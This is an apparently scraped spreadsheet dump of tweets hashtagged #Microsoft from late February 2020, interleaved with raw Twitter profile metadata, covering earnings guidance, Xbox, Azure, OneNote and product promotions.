    <t>{'id': 258374854, 'id_str': '258374854', 'name': 'Don Curren', 'screen_name': 'dbcurren', 'location': 'Toronto', 'description': 'Writer/Editor, ex WSJ, DJ, Reuters. macro-economics (mostly Canada), forex, music, eclectic links and soundbite-style philosophy. One of #TRFinRiskCanada40', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5616, 'friends_count': 4361, 'listed_count': 541, 'created_at': 'Sun Feb 27 15:46:20 +0000 2011', 'favourites_count': 45084, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 98256,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'http://pbs.twimg.com/profile_images/2767088881/c8e8e0189f2eada9e50fa6a6297283f4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2767088881/c8e8e0189f2eada9e50fa6a6297283f4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/258374854/1572653814',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</si>
  <si>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21:35:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft tweaks fiscal Q3 guidance on #virus-related supply problems  https://t.co/ee5F5PYMGO</t>
  </si>
  <si>
    <t>{'id': 211189980, 'id_str': '211189980', 'name': 'Cambridge', 'screen_name': 'Cambridge_FX', 'location': 'Global', 'description': 'A trusted partner for 25 years, Cambridge provides global payment and risk management solutions designed to meet your unique business needs.', 'url': 'http://t.co/aLQeP7GNMC', 'entities': {'url': {'urls': [{'url': 'http://t.co/aLQeP7GNMC', 'expanded_url': 'http://www.cambridgefx.com', 'display_url': 'cambridgefx.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1517, 'friends_count': 1063, 'listed_count': 125, 'created_at': 'Tue Nov 02 15:39:06 +0000 2010', 'favourites_count': 4168, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17691, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '003805', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1073247438507433989/1ZDmUtGj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1073247438507433989/1ZDmUtGj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/211189980/1581685201', 'profile_link_color': '352095', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFC940', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>#Microsoft advertises Big Brother as a service. https://t.co/Lv3ZoSdEUH</t>
  </si>
  <si>
    <t>{'id': 416490624, 'id_str': '416490624', 'name': 'Douglas Edwards', 'screen_name': 'SebastosPublius', 'location': 'Biloxi, Mississippi, USA', 'description': 'https://t.co/PfRJXfpMNh', 'url': 'https://t.co/aNizUSxhiq', 'entities': {'url': {'urls': [{'url': 'https://t.co/aNizUSxhiq', 'expanded_url': 'http://dedicto.com', 'display_url': 'dedicto.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/PfRJXfpMNh', 'expanded_url': 'http://mastodon.social/@dedicto', 'display_url': 'mastodon.social/@dedicto', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 1435, 'friends_count': 3022, 'listed_count': 138, 'created_at': 'Sat Nov 19 19:24:25 +0000 2011', 'favourites_count': 83721, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 116546,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'http://pbs.twimg.com/profile_images/3576271039/cc3485b763b35b7d0f3a456c53426c19_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3576271039/cc3485b763b35b7d0f3a456c53426c19_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/416490624/1355397496', 'profile_link_color': 'FF0000',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</si>
  <si>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Wed Feb 26 21:35:09 +0000 2020</t>
  </si>
  <si>
    <t>This @wakelet collection is of my articles about my features and tools in #Microsoft #OneNote @msonenote 
 https://t.co/EPKsaMRlwU
#MIEExpert 
#OneNote 
#Microsoft 
#MicrosoftEDU 
#UDL
#accessibility
#ImmersiveReader</t>
  </si>
  <si>
    <t>Wed Feb 26 21:33:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Updates Extended Support for Windows 7, Windows Server 2008 and 2008 R2. Check out our latest blog to learn more! #btgrocks #Microsoft #Windows7 #WindowsServer2008
https://t.co/G4AUzmIm8F</t>
  </si>
  <si>
    <t>Wed Feb 26 21:33:17 +0000 2020</t>
  </si>
  <si>
    <t>Great initiative and what's even bigger is that the teacher's are willing to learn from a 13 yr old Creative writing lessons on #Minecraft is a phenomenal step. Kudos to #Microsoft for leveraging their technologies and respect to these #TEACHers
https://t.co/ohOFnTTMCV</t>
  </si>
  <si>
    <t>{'id': 4027736560, 'id_str': '4027736560', 'name': 'VocaTales', 'screen_name': 'vocatales', 'location': 'Chicago, IL', 'description': 'Wacky wordplay, storytelling sorcery, and endless imaginative challenges are waiting for you in the world of VocaTales. #SplitAndSpin!', 'url': 'https://t.co/v9o5zSdeyC', 'entities': {'url': {'urls': [{'url': 'https://t.co/v9o5zSdeyC', 'expanded_url': 'http://www.vocatales.com', 'display_url': 'vocatales.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 558, 'listed_count': 0, 'created_at': 'Fri Oct 23 23:48:14 +0000 2015', 'favourites_count': 51, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 100,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'http://pbs.twimg.com/profile_images/1231012429871620102/YrWjuOtZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231012429871620102/YrWjuOtZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4027736560/1582318965',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</si>
  <si>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21:32:23 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.84 to WSUS: https://t.co/oOzcJRbkfl #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 21:30:33 +0000 2020</t>
  </si>
  <si>
    <t>LEADER EXP0 2020 - BRISBANE - REGISTER NOW! Australia's Largest Reseller Expo | Plenty of food and drinks
 Register Now: https://t.co/ORpNQJU7wI
#LeaderEXPO #Intel #Ubiquiti #Microsoft @ubnt @Microsoft @intel https://t.co/Ehdm2noT7S</t>
  </si>
  <si>
    <t>{'id': 252451229, 'id_str': '252451229', 'name': 'Leader Computers', 'screen_name': 'LeaderComputers', 'location': 'www.leader-online.com.au', 'description': "One of Australiaâ€™s largest National IT&amp;T Distributors. 100% Australian. Trade only. Also manufacturer of notebooks, tablets and desktop PC's.", 'url': 'http://t.co/Lmoz0e7Eus', 'entities': {'url': {'urls': [{'url': 'http://t.co/Lmoz0e7Eus', 'expanded_url': 'http://www.leadersystems.com.au', 'display_url': 'leadersystems.com.au', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 329, 'friends_count': 547, 'listed_count': 4, 'created_at': 'Tue Feb 15 06:31:16 +0000 2011', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 273,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'http://pbs.twimg.com/profile_images/554797142426910720/MGEbWhJp_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/554797142426910720/MGEbWhJp_normal.png',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</si>
  <si>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21:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#PayPal, #Facebook, #Netflix, #Microsoft: what have in common? Top 4 of most impersonated companies for #phishing. Knowing where attacks can come from a start to defending. https://t.co/fbBlbO1spf #HIPAA https://t.co/VDWot5t9j6</t>
  </si>
  <si>
    <t>{'id': 338301059, 'id_str': '338301059', 'name': 'Matt Fisher', 'screen_name': 'Matt_R_Fisher', 'location': 'Worcester, MA', 'description': 'Healthcare lawyer #HIPAA, privacy/security. Mirick Oâ€™Connell Health Law Chair Host #HCdeJure @abahealthlaw Council #HIMSS Digital Influencer. Viewsâ‰ legaladvice', 'url': 'https://t.co/whgFynpzY5', 'entities': {'url': {'urls': [{'url': 'https://t.co/whgFynpzY5', 'expanded_url': 'http://www.mirickoconnell.com/attorneys/matthew-r-fisher', 'display_url': 'mirickoconnell.com/attorneys/mattâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6820, 'friends_count': 1782, 'listed_count': 833, 'created_at': 'Tue Jul 19 11:19:26 +0000 2011', 'favourites_count': 7543, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33337,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'http://pbs.twimg.com/profile_images/963443800281636865/4BU1Mrx4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963443800281636865/4BU1Mrx4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/338301059/1521489276',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</si>
  <si>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21:28:49 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says it will not meet quarterly guidance
#microsoft #MSFT #coronavirus
https://t.co/Ibwq7iqSzD</t>
  </si>
  <si>
    <t>Wed Feb 26 21:26:31 +0000 2020</t>
  </si>
  <si>
    <t>Or how to make simple a complex IoT security process: @GlobalSign and @Infineon Combine Forces to Strengthen IoT Device Identity and Trustworthiness for Simplified, Seamless Enrollment into #Microsoft @Azure #IoT https://t.co/DyG1Wu5haR via @iotforall</t>
  </si>
  <si>
    <t>Wed Feb 26 21:23:01 +0000 2020</t>
  </si>
  <si>
    <t>Its reported that the Microsoft Series X will allow you to resume 'multiple' games even after a reboot. Pretty fancy stuff.
#XboxSeriesX #microsoft #Xbox #XboxOne</t>
  </si>
  <si>
    <t>Wed Feb 26 21:22:51 +0000 2020</t>
  </si>
  <si>
    <t>#Dear #Lord #Jesus
may #contemporary #organizations not cause things that are originally #free 
cost #money ... #google #microsoft #apple #samsung 
In #Yasu #Name #Amen</t>
  </si>
  <si>
    <t>{'id': 1143536690688155650, 'id_str': '1143536690688155650', 'name': 'Jay Colosi', 'screen_name': 'JayBeamer', 'location': 'Upstate', 'description': 'Twitter page of Jeremy C.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Tue Jun 25 15:09:27 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 300, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234244100792160266/bzkI73WU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234244100792160266/bzkI73WU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1143536690688155650/1583073553',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</si>
  <si>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21:21:26 +0000 2020</t>
  </si>
  <si>
    <t>Knowledge is power--subscribing is empowerment. Discover how #Microsoft #Dynamics365 can empower your organization with the know-how and tools to gain sales momentum, boost productivity, and close more deals by subscribing to this channel. https://t.co/vEF4vyB4JJ</t>
  </si>
  <si>
    <t>Wed Feb 26 21:20:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft $MSFT update on Q3 FY20 guidance https://t.co/96G3bAUhAC</t>
  </si>
  <si>
    <t>Wed Feb 26 21:16:44 +0000 2020</t>
  </si>
  <si>
    <t>Azure Bastion: VM #RDP &amp;amp; #SSH Access within #Azure Portal
 #Bastion #Jumpbox #security #Microsoft
https://t.co/099ZeCfAv3</t>
  </si>
  <si>
    <t>Wed Feb 26 21:15:49 +0000 2020</t>
  </si>
  <si>
    <t>Video Conferencing Gets a Makeover
Companies like Zoom and Microsoft are trying to make the remote connections more realand fun. Trouble is, humans are awkward
#video #videoconferencing #Zoom #microsoft #GTM #meetings https://t.co/G7TWGPZypQ https://t.co/3I0xKAyJa6</t>
  </si>
  <si>
    <t>{'id': 29230762, 'id_str': '29230762', 'name': 'Rik Walters', 'screen_name': 'rikwalters', 'location': 'San Francisco, CA', 'description': 'Demand #Marketing and Revenue Growth leader at @Cradlepoint | #demandmarketing  | Ex @RedisLabs @Twitter @Apple \uf8ff | \nAmerikaner ðŸ‡ºðŸ‡¸ aus #Ã–sterreich ðŸ‡¦ðŸ‡¹', 'url': 'https://t.co/vyPoJo7Dk6', 'entities': {'url': {'urls': [{'url': 'https://t.co/vyPoJo7Dk6', 'expanded_url': 'https://www.linkedin.com/in/rikwalters/', 'display_url': 'linkedin.com/in/rikwalters/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 127485, 'friends_count': 124722, 'listed_count': 2500, 'created_at': 'Mon Apr 06 16:10:33 +0000 2009', 'favourites_count': 10843, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 38425, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0D0B0D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187384961419972613/8mdSdGys_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187384961419972613/8mdSdGys_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29230762/1571928521', 'profile_link_color': '2B3E7B', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'D5D5D9', 'profile_text_color': '1E85B8', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 21:15:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns it will miss guidance for segment that includes Windows because of #coronavirus $msft $aapl $yumc $spy $dia $qqq  https://t.co/FoBNVRwRz5</t>
  </si>
  <si>
    <t>{'id': 2921952326, 'id_str': '2921952326', 'name': 'Cash Flow Investor', 'screen_name': 'BoB2Trader', 'location': 'Irvine, CA', 'description': 'High-yield investments in dividend-paying stocks, bonds, REITs mREITs MLPs BDCs CLOs &amp; CEFs/ETFs. Manages an income-focused portfolio across all asset classes.', 'url': 'https://t.co/XHwUS6gG03', 'entities': {'url': {'urls': [{'url': 'https://t.co/XHwUS6gG03', 'expanded_url': 'https://twitter.com/BoB2Trader', 'display_url': 'twitter.com/BoB2Trader', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 954, 'friends_count': 47, 'listed_count': 165, 'created_at': 'Sun Dec 07 18:06:56 +0000 2014', 'favourites_count': 3065, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39137,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'http://pbs.twimg.com/profile_images/1007973630024638466/d4ES-R56_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007973630024638466/d4ES-R56_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2921952326/1514820480',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</si>
  <si>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21:15:13 +0000 2020</t>
  </si>
  <si>
    <t>Master Chief resurfaces with a few soldiers after a explosion. While regrouping others issues occurred and trail and error on the Hardest Difficulty. https://t.co/Av0VyPZc2L for video. #halo3 #haloinfinite #facebookgaming #xboxgamepass #firsttimeplaying #masterchief #microsoft https://t.co/lTrE1duKIp</t>
  </si>
  <si>
    <t>{'id': 2384339374, 'id_str': '2384339374', 'name': 'Terrell Graham', 'screen_name': 'rellyrellgaming', 'location': 'Wilson, NC', 'description': 'I am a Gamer who loves wrestling, all genres of gaming. Goofy but I has home trained. Stream account is - https://t.co/9Um5fcWxfI', 'url': 'https://t.co/YBIwqgStXd', 'entities': {'url': {'urls': [{'url': 'https://t.co/YBIwqgStXd', 'expanded_url': 'https://m.facebook.com/RellyRellGaming/videos/', 'display_url': 'm.facebook.com/RellyRellGaminâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/9Um5fcWxfI', 'expanded_url': 'https://mixer.com/RellyRellGames/mobile', 'display_url': 'mixer.com/RellyRellGamesâ€¦', 'indices': [106, 129]}]}}, 'protected': False, 'followers_count': 68, 'friends_count': 557, 'listed_count': 0, 'created_at': 'Wed Mar 05 04:36:12 +0000 2014', 'favourites_count': 2800, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4878,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'http://pbs.twimg.com/profile_images/1074735508444639235/oaGsAnrg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074735508444639235/oaGsAnrg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2384339374/1545071888',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</si>
  <si>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21:14:29 +0000 2020</t>
  </si>
  <si>
    <t>Master Chief resurfaces with a few soldiers after a explosion. While regrouping others issues occurred and trail and error on the Hardest Difficulty. https://t.co/Av0VyPZc2L for video. #halo3 #haloinfinite #facebookgaming #xboxgamepass #firsttimeplaying #masterchief #microsoft https://t.co/4wyOOMo6PO</t>
  </si>
  <si>
    <t>#Microsoft just pre announced</t>
  </si>
  <si>
    <t>{'id': 19651092, 'id_str': '19651092', 'name': 'MrTopStep', 'screen_name': 'MrTopStep', 'location': 'Chicago, IL', 'description': 'The information in these Market Commentaries do not constitute a solicitation of the purchase or sale of any futures or options contracts.', 'url': 'http://t.co/P8D0VyzC0J', 'entities': {'url': {'urls': [{'url': 'http://t.co/P8D0VyzC0J', 'expanded_url': 'http://www.mrtopstep.com/', 'display_url': 'mrtopstep.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25346, 'friends_count': 414, 'listed_count': 1206, 'created_at': 'Wed Jan 28 13:26:49 +0000 2009', 'favourites_count': 3176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 219029, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E9ECF1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000264951777/fdcb2fffc58110f966d01c65c5daf7df_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000264951777/fdcb2fffc58110f966d01c65c5daf7df_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19651092/1354206197',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</si>
  <si>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Wed Feb 26 21:10:14 +0000 2020</t>
  </si>
  <si>
    <t>Learn all about #Microsoft Dynamics Business Central here! https://t.co/oJtOxEvNoH</t>
  </si>
  <si>
    <t>Wed Feb 26 21:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsofts Xbox Series X will be able to resume games even after a reboot https://t.co/XmjBsFMG2v https://t.co/gXPRpYdzXj</t>
  </si>
  <si>
    <t>Wed Feb 26 21:10:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edges offline Surf game looks like more fun... https://t.co/M9PBHWhF5d</t>
  </si>
  <si>
    <t>Wed Feb 26 21:07:34 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Hackers Scanning for Vulnerable Microsoft Exchange Servers, Patch Now!:" https://t.co/80apFYE7I9
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 21:07:05 +0000 2020</t>
  </si>
  <si>
    <t>So for you #Microsoft peeps, SBC is just around the corner.  Today in Studio A... https://t.co/RMiVrCsgEA</t>
  </si>
  <si>
    <t>{'id': 984923577639026693, 'id_str': '984923577639026693', 'name': 'John Marlin', 'screen_name': 'JohnMarlin_MSFT', 'location': 'Redmond, WA', 'description': 'Politics are me, not MSFT.  Program Manager focused on #FailoverClustering, #AzureStackHCI, #Storage, #StorageReplica @Microsoft.  Public Speaker.', 'url': 'https://t.co/c6iNkmvMRG', 'entities': {'url': {'urls': [{'url': 'https://t.co/c6iNkmvMRG', 'expanded_url': 'https://aka.ms/ClusterBlog', 'display_url': 'aka.ms/ClusterBlog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 611, 'friends_count': 243, 'listed_count': 7, 'created_at': 'Fri Apr 13 22:37:34 +0000 2018', 'favourites_count': 880, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2954,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'http://pbs.twimg.com/profile_images/1151529940325502977/bx5noAEK_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151529940325502977/bx5noAEK_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/984923577639026693/1563480846',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</si>
  <si>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21:05:56 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft accelerate to shift production of new phones, personal computers and other devices from #China to #SoutheastAsia amid the worsening #CoronavirusOutbreak. #Vietnam and #Thailand are expected to be the beneficiaries.
https://t.co/U4a1lmutXf</t>
  </si>
  <si>
    <t>Wed Feb 26 21:04:16 +0000 2020</t>
  </si>
  <si>
    <t>Investing in a cybersecurity program is no longer optional, no matter the size of your business. Check out this infographic to learn more about how you can protect your business with our #Microsoft #security solutions. https://t.co/SX29kWPXUM</t>
  </si>
  <si>
    <t>Wed Feb 26 21:04:02 +0000 2020</t>
  </si>
  <si>
    <t>OneNote for Android updated with dark mode support and other improvements #MIcrosoft #OneNote #Darkmode https://t.co/x5JtPSXm5y https://t.co/dY78ZRoEom</t>
  </si>
  <si>
    <t>Wed Feb 26 21:01:15 +0000 2020</t>
  </si>
  <si>
    <t>Save UP TO $330 On Microsoft Surface Deals!
https://t.co/QEwNOn9S5Z
#Microsoft #tech #deals #cashback</t>
  </si>
  <si>
    <t>{'id': 703296489011937280, 'id_str': '703296489011937280', 'name': 'Lemoney', 'screen_name': 'lemoneyway', 'location': 'United States', 'description': 'Meet Lemoney, the website with the best cash back rate on the market at more than 1700 stores. Follow us for the latest coupons, sales and opportunities! ðŸ˜ŽðŸ‹', 'url': 'https://t.co/5rN9BQXIJ3', 'entities': {'url': {'urls': [{'url': 'https://t.co/5rN9BQXIJ3', 'expanded_url': 'http://lemoney.com', 'display_url': 'lemoney.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1026, 'friends_count': 865, 'listed_count': 5, 'created_at': 'Fri Feb 26 19:12:04 +0000 2016', 'favourites_count': 3039, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2119,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'http://pbs.twimg.com/profile_images/1162091356422057985/3aqViDp__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162091356422057985/3aqViDp__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/703296489011937280/1567100250',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</si>
  <si>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21:00:59 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 could get a new Start menu as #Microsoft kills off one of its most useless features https://t.co/qDwfjbdHa4 https://t.co/vL8IzYhiDV</t>
  </si>
  <si>
    <t>{'id': 140839822, 'id_str': '140839822', 'name': 'Big Picture Web Design', 'screen_name': 'bpwd', 'location': 'Spring Hill, TN', 'description': 'Know How to Get More of the #Prospects You Love This Year! #Design, #Hosting, Inbound #Marketing, #SEO, #Conversion, #PPC, #Social, #Geomarketing &amp; #Logos.', 'url': 'http://t.co/EK2tHQO0v3', 'entities': {'url': {'urls': [{'url': 'http://t.co/EK2tHQO0v3', 'expanded_url': 'http://www.bigpicturewebdesign.com', 'display_url': 'bigpicturewebdesign.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 350, 'friends_count': 504, 'listed_count': 79, 'created_at': 'Thu May 06 14:01:13 +0000 2010', 'favourites_count': 1639, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2444, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '697E99', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/543554145060286464/_Onv1X8c_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/543554145060286464/_Onv1X8c_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/140839822/1529732562', 'profile_link_color': '697E99', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '141313', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 21:00:54 +0000 2020</t>
  </si>
  <si>
    <t>We this quote. 
"I believe in innovation and that the way you get innovation is you fund research and you learn the basic facts."
-Bill Gates
#innovation #business #marketing #company #microsoft #tampa #atlanta #quoteoftheday</t>
  </si>
  <si>
    <t>Wed Feb 26 20:54:19 +0000 2020</t>
  </si>
  <si>
    <t>Yakuza 0 Now Available on Xbox One Game Pass and Windows 10! Xbox fans finally have a chance to step into Kiryu and Majima's shoes for themselves
 #gamer #gamers #gaming #gamingnews #microsoft #PC #pcgamer #pcgaming #xbox #xboxgaming #xboxone https://t.co/uK9vREWkZ7 https://t.co/awRP1tHUAx</t>
  </si>
  <si>
    <t>{'id': 1103908154889330691, 'id_str': '1103908154889330691', 'name': 'gamer-plus', 'screen_name': 'gamerplusEU', 'location': '', 'description': 'Gaming news, reviews &amp; more', 'url': 'https://t.co/qaMSkMkz9r', 'entities': {'url': {'urls': [{'url': 'https://t.co/qaMSkMkz9r', 'expanded_url': 'https://www.gamer-plus.co.uk', 'display_url': 'gamer-plus.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 151, 'friends_count': 415, 'listed_count': 0, 'created_at': 'Fri Mar 08 06:39:48 +0000 2019', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 800,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'http://pbs.twimg.com/profile_images/1117402381644333058/XSNh0RXR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117402381644333058/XSNh0RXR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103908154889330691/1552209111', 'profile_link_color': '042145',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</si>
  <si>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20:51:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Endpoint #Manager: Bringing together #SCCM and #Intune. https://t.co/4KgTew5UAM via @YouTube</t>
  </si>
  <si>
    <t>{'id': 212754928, 'id_str': '212754928', 'name': 'Johnson Cruz', 'screen_name': 'johnsonscruz', 'location': 'SÃ£o Paulo, SP', 'description': 'Carioca, nascido em 1989, analista de suporte tÃ©cnico desde 2006, morador de SÃ£o Paulo desde 2010, e especialista tÃ©cnico entusiasta de tecnologias Microsoft.', 'url': 'https://t.co/wCptKwrsOc', 'entities': {'url': {'urls': [{'url': 'https://t.co/wCptKwrsOc', 'expanded_url': 'http://blog.techjohnson.com.br', 'display_url': 'blog.techjohnson.com.br', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 127, 'friends_count': 505, 'listed_count': 17, 'created_at': 'Sat Nov 06 23:46:23 +0000 2010', 'favourites_count': 5851, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7118,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'http://pbs.twimg.com/profile_images/1081322788634398721/-vJm764k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081322788634398721/-vJm764k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/212754928/1474415005',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</si>
  <si>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20:50:31 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Xbox Series X will be able to resume games even after a reboot https://t.co/Y4BWpPBw7m #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 20:50:07 +0000 2020</t>
  </si>
  <si>
    <t>10 Things You Should Know about Microsoft Azure DevOps Server Azure DevOps Server has officially been released. #deployment #business #microsoft #github https://t.co/2vH4QWTniN https://t.co/yCwosVcSVX</t>
  </si>
  <si>
    <t>Wed Feb 26 20:46:02 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus leads Microsoft to cancel Ignite Tour stop in Hong Kong, reports WindowsCentral https://t.co/fkyvAtOx3Y #coronavirus #Microsoft https://t.co/ysxf129TzE</t>
  </si>
  <si>
    <t>Wed Feb 26 20:43:04 +0000 2020</t>
  </si>
  <si>
    <t>Check out  MICROSOFT SIDEWINDER PRECISION PRO X03-57540 JOYSTICK FLIGHT SIMULATOR #Microsoft https://t.co/2OuL0Js7ef via @eBay</t>
  </si>
  <si>
